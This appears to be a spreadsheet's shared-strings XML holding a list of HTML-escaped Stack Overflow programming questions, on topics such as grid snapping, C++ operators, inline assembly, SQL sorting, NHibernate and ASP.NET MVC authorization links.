  <si>
    <t>What is wrong with my snap to grid code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First of all, I'm fairly sure snapping to grid is fairly easy, however I've run into some odd trouble in this situation and my maths are too weak to work out specifically what is wrong.&lt;/p&gt;
&lt;p&gt;Here's the situation&lt;/p&gt;
&lt;p&gt;I have an abstract concept of a grid, with Y steps exactly Y_STEP apart (the x steps are working fine so ignore them for now)&lt;/p&gt;
&lt;p&gt;The grid is in an abstract coordinate space, and to get things to line up I've got a magic offset in there, let's call it Y_OFFSET&lt;/p&gt;
&lt;p&gt;to snap to the grid I've got the following code (python)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def snapToGrid(originalPos, offset, step):
    index = int((originalPos - offset) / step) #truncates the remainder away
    return index * gap + offset
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so I pass the cursor position, Y_OFFSET and Y_STEP into that function and it returns me the nearest floored y position on the grid&lt;/p&gt;
&lt;p&gt;That appears to work fine in the original scenario, however when I take into account the fact that the view is scrollable things get a little weird.&lt;/p&gt;
&lt;p&gt;Scrolling is made as basic as I can get it, I've got a viewPort that keeps count of the distance scrolled along the Y Axis and just offsets everything that goes through it.&lt;/p&gt;
&lt;p&gt;Here's a snippet of the cursor's mouseMotion code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def mouseMotion(self, event):
    pixelPos = event.pos[Y]
    odePos = Scroll.pixelPosToOdePos(pixelPos)
    self.tool.positionChanged(odePos)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So there's two things to look at there, first the Scroll module's translation from pixel position to the abstract coordinate space, then the tool's positionChanged function which takes the abstract coordinate space value and snaps to the nearest Y step.&lt;/p&gt;
&lt;p&gt;Here's the relevant Scroll code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def pixelPosToOdePos(pixelPos):
    offsetPixelPos = pixelPos - self.viewPortOffset
    return pixelsToOde(offsetPixelPos)
def pixelsToOde(pixels):
    return float(pixels) / float(pixels_in_an_ode_unit)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the tools update code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def positionChanged(self, newPos):
    self.snappedPos = snapToGrid(originalPos, Y_OFFSET, Y_STEP)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The last relevant chunk is when the tool goes to render itself.  It goes through the Scroll object, which transforms the tool's snapped coordinate space position into an onscreen pixel position, here's the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#in Tool
def render(self, screen):
    Scroll.render(screen, self.image, self.snappedPos)
#in Scroll
def render(self, screen, image, odePos):
    pixelPos = self.odePosToPixelPos(odePos)
    screen.blit(image, pixelPos) # screen is a surface from pygame for the curious
def odePosToPixelPos(self.odePos):
    offsetPos = odePos + self.viewPortOffset
    return odeToPixels(offsetPos)
def odeToPixels(odeUnits):
    return int(odeUnits * pixels_in_an_ode_unit)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Whew, that was a long explanation.  Hope you're still with me... &lt;/p&gt;
&lt;p&gt;The problem I'm now getting is that when I scroll up the drawn image loses alignment with the cursor.&lt;br /&gt;
It starts snapping to the Y step exactly 1 step below the cursor.
Additionally it appears to phase in and out of allignment.&lt;br /&gt;
At some scrolls it is out by 1 and other scrolls it is spot on.&lt;br /&gt;
It's never out by more than 1 and it's always snapping to a valid grid location.&lt;/p&gt;
&lt;p&gt;Best guess I can come up with is that somewhere I'm truncating some data in the wrong spot, but no idea where or how it ends up with this behavior.&lt;/p&gt;
&lt;p&gt;Anyone familiar with coordinate spaces, scrolling and snapping?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to use the same file for both a RTP and a kernel module in vxWorks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a vxWorks application that we would like to deploy either as a kernel module, or as a Real-Time process.&lt;/p&gt;
&lt;p&gt;Is there a way to do this from the same source file, or do we have to create one file for the kernel module and another for the RTP?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best signature for overloaded arithmetic operators in C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I had assumed that the canonical form for operator+, assuming the existence of an overloaded operator+= member function, was like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const T operator+(const T&amp;amp; lhs, const T&amp;amp; rhs)
{
    return T(lhs) +=rhs;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it was pointed out to me that this would also work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const T operator+ (T lhs, const T&amp;amp; rhs)
{
    return lhs+=rhs;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In essence, this form transfers creation of the temporary from the body of the implementation to the function call.&lt;/p&gt;
&lt;p&gt;It seems a little awkward to have different types for the two parameters, but is there anything wrong with the second form?  Is there a reason to prefer one over the other?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>GCC inline assembler, mixing register sizes (x86)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how I can get rid of the following assembler warning?&lt;/p&gt;
&lt;p&gt;Code is x86, 32 bit:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int test (int x)
{
  int y;
  // do a bit-rotate by 8 on the lower word. leave upper word intact.
  asm ("rorw $8, %0\n\t": "=q"(y) :"0"(x));
  return y;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I compile it I get the following (very valid) warning:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Warning: using `%ax' instead of `%eax' due to `w' suffix
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I'm looking for is a way to tell the compiler/assembler that I want to access the lower 16 bit sub-register of %0. Accessing the byte sub-registers (in this case AL and AH) would be nice to know as well. &lt;/p&gt;
&lt;p&gt;I've already chosen the "q" modifier, so the compiler is forced to use EAX, EBX, ECX or EDX. I've made sure the compiler has to pick a register that has sub-registers.&lt;/p&gt;
&lt;p&gt;I know that I can force the asm-code to use a specific register (and its sub-registers), but I want to leave the register-allocation job up to the compiler.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to count rows in Lift (Scala's web framework)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to add a property to my User model that returns the number of rows in the Project table that have a user Id of the user.&lt;/p&gt;
&lt;p&gt;So something like this...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def numProjects = {
    /* somehow get count from Project table
       The straight sql would be:
       SELECT COUNT(*) FROM projects WHERE userId = &amp;lt;the current user&amp;gt;
     */
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Best way to secure an AJAX app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently working on the authentication of an AJAX based site, and was wondering if anybody had any reccomendations on best practices for this sort of thing.&lt;/p&gt;
&lt;p&gt;My original approach was a cookie based system.  Essentially I set a cookie with an auth code, and every data access changed the cookie.  As well, whenever there was a failed authentication, all sessions by that user were de-authenticated, to keep hijackers out.  To hijack a session, somebody would have to leave themselves logged in, and a hacker would need to have the very last cookie update sent to spoof a session.&lt;/p&gt;
&lt;p&gt;Unfortunatley, due to the nature of AJAX, when making multiple requests quickly, they might come back out of order, setting the cookie wrong, and breaking the session, so I need to reimplement.&lt;/p&gt;
&lt;p&gt;My ideas were: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A decidedly less secure session based method&lt;/li&gt;
&lt;li&gt;using SSL over the whole site (seems like overkill)&lt;/li&gt;
&lt;li&gt;Using an iFrame which is ssl authenticated to do secure transactions (I just sorta assume this is possible, with a little bit of jquery hacking)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The issue is not the data being transferred, the only concern is that somebody might get control over an account that is not theirs.&lt;/p&gt;
&lt;p&gt;A decidedly less secure session based method&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the print functions in Adobe AIR?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to figure out how to print in Adobe AIR. I know the standard javascript functions don't work. The AIRforJSDev guide says:
"The window.print() method is not supported within Adobe 
AIR 1.0. There are other methods available via the exposed AIRAPIs that give you access to printing within the runtime"&lt;/p&gt;
&lt;p&gt;But I can't find those functions. I've looked in the language reference but can't find them there anywhere. Where are they and what are they ? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Connection to report server could not be made from BI VS 2005 but the report server is browseable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have IIS6 configured such that browsing to &lt;a href="http://localhost:8082/Reports" rel="nofollow"&gt;http://localhost:8082/Reports&lt;/a&gt; gets me the reporting services default home page, which is all as expected. However, when I try to publish a report via Microsoft Business Intelligence Visual Studio 2005 I get the following error: A connection could not be made to the report server  &lt;a href="http://localhost:8082/Reports" rel="nofollow"&gt;http://localhost:8082/Reports&lt;/a&gt; The attempt to connect to the report server failed. Check your connection information and that the report server is a compatible version. &lt;/p&gt;
&lt;p&gt;I have windows authentication turned on for report server. Does that have anything to do with not being able to publish projects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I make a SharePoint Image Web Part clickable to link to another page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The Image Web Part doesn't seem to have an href attribute that I can set.  Is there something I am missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between Events with Delegate Handlers and those without?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the difference between this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this.btnOk.Click += new System.EventHandler(this.btnOK_Click);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this.btnOk.Click += this.btnOK_Click;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;They both work.  The former is what Visual Studio defaults to when you use the snippets.  But it seems like it only ads extra verbiage, or am I missing something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What tools allows me to keep track of html tags when doing web development?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tools allows me keep track of tags when doing web development? For example, I would like to be able to quickly find whether I missed closing a div tag.&lt;/p&gt;
&lt;p&gt;At the moment I am using notepad++ to write html. It highlights starting and ending tags, but it can take me time to review almost all tags to find where I went wrong.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Specify the from user when sending email using the mail command</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know how to change the from user when sending email using the mail command? I have looked through the man page and can not see how to do this. &lt;/p&gt;
&lt;p&gt;We are running Redhat Linux 5.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Business Logic: Database or Application Layer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The age old question. Where should you put your business logic, in the database as stored procedures ( or packages ), or in the application/middle tier? And more importantly, Why?&lt;/p&gt;
&lt;p&gt;Assume database independence is not a goal.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I want to log the Poison message that my wcf service is dropping using MSMQ 3.0 and windows 2003</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to log the Poison message that my wcf service is dropping using MSMQ 3.0 and windows 2003&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I sort a VARCHAR column in SQL server that contains numbers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;VARCHAR&lt;/code&gt; column in a &lt;code&gt;SQL Server 2000&lt;/code&gt; database that can contain either letters or numbers. It depends on how the application is configured on the front-end for the customer. &lt;/p&gt;
&lt;p&gt;When it does contain numbers, I want it to be sorted numerically, e.g. as "1", "2", "10" instead of "1", "10", "2". Fields containing just letters, or letters and numbers (such as 'A1') can be sorted alphabetically as normal. For example, this would be an acceptable sort order.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1
2
10
A
B
B1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the best way to achieve this? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Shortcut to switch between markup and code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using Visual Studio 2008 Team Edition, is it possible to assign a shortcut key that switches between markup and code? If not, is it possible to assign a shortcut key that goes from code to markup?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to export fonts and colors from VS2008 to VS2005?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been forced to work in Visual Studio 2005 and would like to export my fonts and colors from Visual Studio 2008. However, VS2005 complains about wrong export document version. Is there any good way to do this besides manually changing each color and font?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detect via javascript whether Silverlight is installed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a javascript function I can use to detect whether a specific silverlight version is installed in the current browser?&lt;/p&gt;
&lt;p&gt;I'm particularly interested in the Silverlight 2 Beta 2 version. I don't want to use the default method of having an image behind the silverlight control which is just shown if the Silverlight plugin doesn't load.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; From link provided in accepted answer:&lt;/p&gt;
&lt;p&gt;Include Silverlight.js (from Silverlight SDK)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Silverlight.isInstalled("2.0");
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can you get more information about processes when Linux runs out of memory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I had recently a problem with oom-killer starting to kill processes after some time. I could see that the memory was consumed, but by the time I got to the server it wasn't clear anymore what consumed it. Is there a good non-obvious place to get more info about oom-killer? E.g. detailed info about processes at the time of activation, detailed info about killed processes and reasons for the choice?&lt;/p&gt;
&lt;p&gt;I'm looking for a specific place to find this information, specific tool to gather it or some configuration to improve oom-killer reporting. I'm not looking for generic info about oom-killer. /var/messages by default will only contain a detailed report on the free/allocated memory, but not specific processes it was allocated to.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Save drop-down history in a Firefox Toolbar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm doing some testing on Firefox toolbars for the sake of learning and I can't find out any information on how to store the contents of a "search" drop-down inside the user's profile.&lt;/p&gt;
&lt;p&gt;Is there any tutorial on how to sort this out?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to do query auto-completion/suggestions in Lucene?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a way to do query auto-completion/suggestions in Lucene. I've Googled around a bit and played around a bit, but all of the examples I've seen seem to be setting up filters in Solr. We don't use Solr and aren't planning to move to using Solr in the near future, and Solr is obviously just wrapping around Lucene anyway, so I imagine there must be a way to do it!&lt;/p&gt;
&lt;p&gt;I've looked into using EdgeNGramFilter, and I realise that I'd have to run the filter on the index fields and get the tokens out and then compare them against the inputted Query... I'm just struggling to make the connection between the two into a bit of code, so help is much appreciated!&lt;/p&gt;
&lt;p&gt;To be clear on what I'm looking for (I realised I wasn't being overly clear, sorry) - I'm looking for a solution where when searching for a term, it'd return a list of suggested queries. When typing 'inter' into the search field, it'll come back with a list of suggested queries, such as 'internet', 'international', etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an alternative to the SQL Profiler for SQL Server 2000</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to optimize some stored procedures on a SQL Server 2000 database and when I try to use SQL Profiler I get an error message "In order to run a trace against SQL Server you have to be a member of sysadmin fixed server role.". It seems that only members of the sysadmin role can run traces on the server (something that was fixed in SQL Server 2005) and there is no way in hell that I will be granted that server role (company policies)&lt;/p&gt;
&lt;p&gt;What I'm doing now is inserting the current time minus the time the procedure started at various stages of the code but I find this very tedious &lt;/p&gt;
&lt;p&gt;I was also thinking of replicating the database to a local installation of SQL Server but the stored procedure is using data from many different databases that i will spend a lot of time copying data locally&lt;/p&gt;
&lt;p&gt;So I was wondering if there is some other way of profiling SQL code? (Third party tools,  different practices, something else )&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Short Integers in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Python allocates integers automatically based on the underlying system architecture. Unfortunately I have a huge dataset which needs to be fully loaded into memory. &lt;/p&gt;
&lt;p&gt;So, is there a way to force Python to use only 2 bytes for some integers (equivalent of C++ 'short')?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Irretrievably destroying data in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there anyway in Java to delete data (e.g., a variable value, object) and be sure it can't be recovered from memory? Does assigning &lt;code&gt;null&lt;/code&gt; to a variable in Java delete the value from memory? Any ideas? Answers applicable to other languages are also acceptable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Image icon beside the site URL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to have information about the icons which are displayed alongside the site URLs on a web browser. Is this some browser specific feature? Where do we specify the icon source, ie, is it in some tag on the web page itself ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the most convincing way to require formalized unit testing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This certainly presupposes that unit testing is a good thing. Our projects have some level of unit testing, but it's inconsistent at best.&lt;/p&gt;
&lt;p&gt;What are the most convincing ways that you have used or have had used with you to convince everyone that formalized unit testing is a good thing and that making it required is really in the best interest of the 'largeish' projects we work on. I am not a developer, but I am in Quality Assurance and would like to improve the quality of the work delivered to ensure it is ready to test.&lt;/p&gt;
&lt;p&gt;By formalized unit tests, I'm simply talking about &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Identifying the Unit Tests to be written&lt;/li&gt;
&lt;li&gt;Identifying the test data (or describe it)&lt;/li&gt;
&lt;li&gt;Writing these tests&lt;/li&gt;
&lt;li&gt;Tracking these tests (and re-using as needed)&lt;/li&gt;
&lt;li&gt;Making the results available&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>NHibernate nvarchar/ntext truncation problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using nhibernate to store some user settings for an app in a SQL Server Compact Edition table.&lt;/p&gt;
&lt;p&gt;This is an excerpt the mapping file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;property name="Name" type="string" /&amp;gt;
&amp;lt;property name="Value" type="string" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Name is a regular string/nvarchar(50), and Value is set as ntext in the DB&lt;/p&gt;
&lt;p&gt;I'm trying to write a large amount of xml to the "Value" property. I get an exception every time:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@p1 : String truncation: max=4000, len=35287, value='&amp;lt;lots of xml..../&amp;gt;'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've googled it quite a bit, and tried a number of different mapping configurations:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;property name="Name" type="string" /&amp;gt;
&amp;lt;property name="Value" type="string" &amp;gt;
  &amp;lt;column name="Value" sql-type="StringClob" /&amp;gt;
&amp;lt;/property&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That's one example. Other configurations include "ntext" instead of "StringClob". Those configurations that don't throw mapping exceptions still throw the string truncation exception.&lt;/p&gt;
&lt;p&gt;Is this a problem ("feature") with SQL CE? Is it possible to put more than 4000 characters into a SQL CE database with nhibernate? If so, can anyone tell me how?&lt;/p&gt;
&lt;p&gt;Many thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to update components in different threads? .NET CF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;IÂ´m programming a .NET Compact Framework application which shows maps on a PDA.&lt;/p&gt;
&lt;p&gt;IÂ´ve created an ad hoc component that paints itÂ´s own piece of the whole map, using several of this components the big picture is composed. I did it this way to avoid the latency of painting the whole map in a single step.&lt;/p&gt;
&lt;p&gt;What I would like to do know is to paint this pieces in their own thread, so the map appears to grow as a single entity and (also, and more important) to avoid freezing the rest of the user interface.&lt;/p&gt;
&lt;p&gt;Right know each piece of the map is painted in its onPaint method. My idea is to, somehow, tell the system "execute this code in a thread please".&lt;/p&gt;
&lt;p&gt;Something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected override void OnPaint(PaintEventArgs e)
    {
       // &amp;lt;code to be executed in a thread&amp;gt;
       e.Graphics.paintTHis();
       e.Graphics.paintThat();
       whateverItTakesToPaintThisPieceOfTheMap();
       // &amp;lt;/code to be executed in a thread&amp;gt;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Do you know how to do this? Or is my approach simply wrong?&lt;/p&gt;
&lt;p&gt;Thanks for your time!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check if a trigger is invalid?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on databases that have moving tables auto-generated by some obscure tools. By the way, we have to track information changes in the table via some triggers. And, of course, it occurs that some changes in the table structure broke some triggers, by removing a column or changing its type, for example.&lt;/p&gt;
&lt;p&gt;So, the question is: Is there a way to query the Oracle metadata to check is some triggers are broken, in order to send a report to the support team? &lt;/p&gt;
&lt;p&gt;The user_triggers give all the triggers and tells if they are enable or not, but does not indicate if they are still valid.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stuck creating a "security trimmed" html.ActionLink extension method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create an Extension Method for MVC's htmlHelper.
The purpose is to enable or disable an ActionLink based on the AuthorizeAttribute set on the controller/action.
Borrowing from the &lt;a href="http://blog.maartenballiauw.be/post/2008/08/29/Building-an-ASPNET-MVC-sitemap-provider-with-security-trimming.aspx" rel="nofollow"&gt;MVCSitemap&lt;/a&gt;&lt;br /&gt;
code that Maarten Balliauw created, I wanted to validate the user's permissions against the controller/action before deciding how to render the actionlink.
When I try to get the MvcHandler, I get a null value.
Is there a better way to the the attributes for the controller/action?&lt;/p&gt;
&lt;p&gt;Here is the code for the extension method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static class HtmlHelperExtensions
{
    public static string SecurityTrimmedActionLink(this HtmlHelper htmlHelper, string linkText, string action, string controller)
    {
        //simplified for brevity 
        if (IsAccessibleToUser(action, controller))
        {
            return htmlHelper.ActionLink(linkText, action,controller);    
        }
        else
        {
            return String.Format("&amp;lt;span&amp;gt;{0}&amp;lt;/span&amp;gt;",linkText);    
        }
    }
    public static bool IsAccessibleToUser(string action, string controller)
    {
        HttpContext context = HttpContext.Current;
        MvcHandler handler = context.Handler as MvcHandler;            
        IController verifyController = 
            ControllerBuilder
            .Current
            .GetControllerFactory()
            .CreateController(handler.RequestContext, controller);
        object[] controllerAttributes = verifyController.GetType().GetCustomAttributes(typeof(AuthorizeAttribute), true);
        object[] actionAttributes = verifyController.GetType().GetMethod(action).GetCustomAttributes(typeof(AuthorizeAttribute), true);
        if (controllerAttributes.Length == 0 &amp;amp;&amp;amp; actionAttributes.Length == 0)
            return true;
        IPrincipal principal = handler.RequestContext.HttpContext.User;
        string roles = "";
        string users = "";
        if (controllerAttributes.Length &amp;gt; 0)
        {
            AuthorizeAttribute attribute = controllerAttributes[0] as AuthorizeAttribute;
            roles += attribute.Roles;
            users += attribute.Users;
        }
        if (actionAttributes.Length &amp;gt; 0)
        {
            AuthorizeAttribute attribute = actionAttributes[0] as AuthorizeAttribute;
            roles += attribute.Roles;
            users += attribute.Users;
        }
        if (string.IsNullOrEmpty(roles) &amp;amp;&amp;amp; string.IsNullOrEmpty(users) &amp;amp;&amp;amp; principal.Identity.IsAuthenticated)
            return true;
        string[] roleArray = roles.Split(',');
        string[] usersArray = users.Split(',');
        foreach (string role in roleArray)
        {
            if (role != "*" &amp;amp;&amp;amp; !principal.IsInRole(role)) return false;
        }
        foreach (string user in usersArray)
        {
            if (user != "*" &amp;amp;&amp;amp; (principal.Identity.Name == "" || principal.Identity.Name != user)) return false;
        }
        return true;
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Good Resource Loading System</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently looking for a resource management system for actionscript3. More specifically in this case, I'm looking for opinions on off-the-shelf resource loaders/managers from people who have used them, &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;are they clean/simple to use? &lt;/li&gt;
&lt;li&gt;are they designed to be extended?&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I plan on using this with an MVC like system, Mate is next on the list, has anyone else used a resource loader in this manner?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="http://code.google.com/p/masapi/" rel="nofollow"&gt;masapi&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="http://code.google.com/p/queueloader-as3/" rel="nofollow"&gt;queueloader&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="http://code.google.com/p/bulk-loader/" rel="nofollow"&gt;bulk-loader&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How to do saturating addition in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best (cleanest, most efficient) way to write saturating addition in C?&lt;/p&gt;
&lt;p&gt;The function or macro should add two unsigned inputs (need both 16- and 32-bit versions) and return all-bits-one (0xFFFF or 0xFFFFFFFF) if the sum overflows.&lt;/p&gt;
&lt;p&gt;Target is x86 and ARM using gcc (4.1.2) and Visual Studio (for simulation only, so a fallback implementation is OK there).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I detect what browser is used to access my site?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I detect what browser (IE, Firefox, Opera) the user is accessing my site with?  Examples in Javascript, PHP, ASP, Python, JSP, and any others you can think of would be helpful.  Is there a language agnostic way to get this information?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Point ADO.Net DataSet to different databases at runtime?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a large ADO.Net dataset and two database schemas (Oracle) with different constraints.  The dataset will work with either schema, but I want to be able to tell the dataset which schema to use (via connection string) at runtime.&lt;/p&gt;
&lt;p&gt;Is that even possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a good way of securing an ASP.Net web service call made via Javascript on the click event handler of an HTML button?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The purpose of using a Javascript proxy for the Web Service using a service reference with Script Manager is to avoid a page load. If the information being retrieved is potentially sensitive, is there a way to secure this web service call other than using SSL? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the difference between 'int?' and 'int' in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am 90% sure I saw this answer on stackoverflow before, in fact I had never seen the "int?" syntax before seeing it here, but no matter how I search I can't find the previous post, and it's driving me crazy.&lt;/p&gt;
&lt;p&gt;It's possible that I've been eating the funny mushrooms by accident, but if I'm not, can someone please point out the previous post if they can find it or re-explain it?  My stackoverflow search-fu is apparently too low....&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What Exception should be thrown when an ADO.NET query cannot retrieve the requested data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In an attempt to add some parameter validation and correct usage semantics to our application, we are trying to add correct exception handling to our .NET applications.&lt;/p&gt;
&lt;p&gt;My question is this: When throwing exceptions in ADO.NET if a particular query returns no data or the data could not be found, what type of exception should I use?&lt;/p&gt;
&lt;p&gt;Psuedocode:
(read, don't scrutinize the semantics of the code, I know it won't compile)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public DataSet GetData(int identifier)
{
    dataAdapter.Command.Text = "Select * from table1 Where ident = " + identifier.toString();
    DataSet ds = dataAdapter.Fill(ds);
    if (ds.table1.Rows.Count == 0)
        throw new Exception("Data not found");
    return ds;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Remove Right Click Print Context Menu from Outlook 2007</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Is there any way that I can remove the Print item from the context menu when you right-click on an email with VBA?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I am forever right-clicking to reply to an email, only to accidentally click &lt;code&gt;Print&lt;/code&gt; and have Outlook send it directly to the printer quicker than I can stop it.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://farm4.static.flickr.com/3221/2882658372_496d6e7a11_o.jpg" alt="alt text"&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;NB:&lt;/strong&gt; I am using Outlook 2007.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to get jadclipse working with Eclipse 3.4?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a big fan of the Jadclipse plugin and I'd really like to upgrade to Eclipse 3.4 but the plugin currently does not work. Are there any other programs out there that let you use jad to view source of code you navigate to from Eclipse? (Very useful when delving into ambiguous code in stack traces).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an easy way to attach source in Eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a big fan of the way Visual Studio will give you the comment documentation / parameter names when completing code that you have written and ALSO code that you are referencing (various libraries/assemblies).&lt;/p&gt;
&lt;p&gt;Is there an easy way to get inline javadoc/parameter names in Eclipse when doing code complete or hovering over methods? Via plugin? Via some setting? It's extremely annoying to use a lot of libraries (as happens often in Java) and then have to go to the website or local javadoc location to lookup information when you have it in the source jars right there!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are reserved filenames for various platforms?</t>
  </si>
  <si>
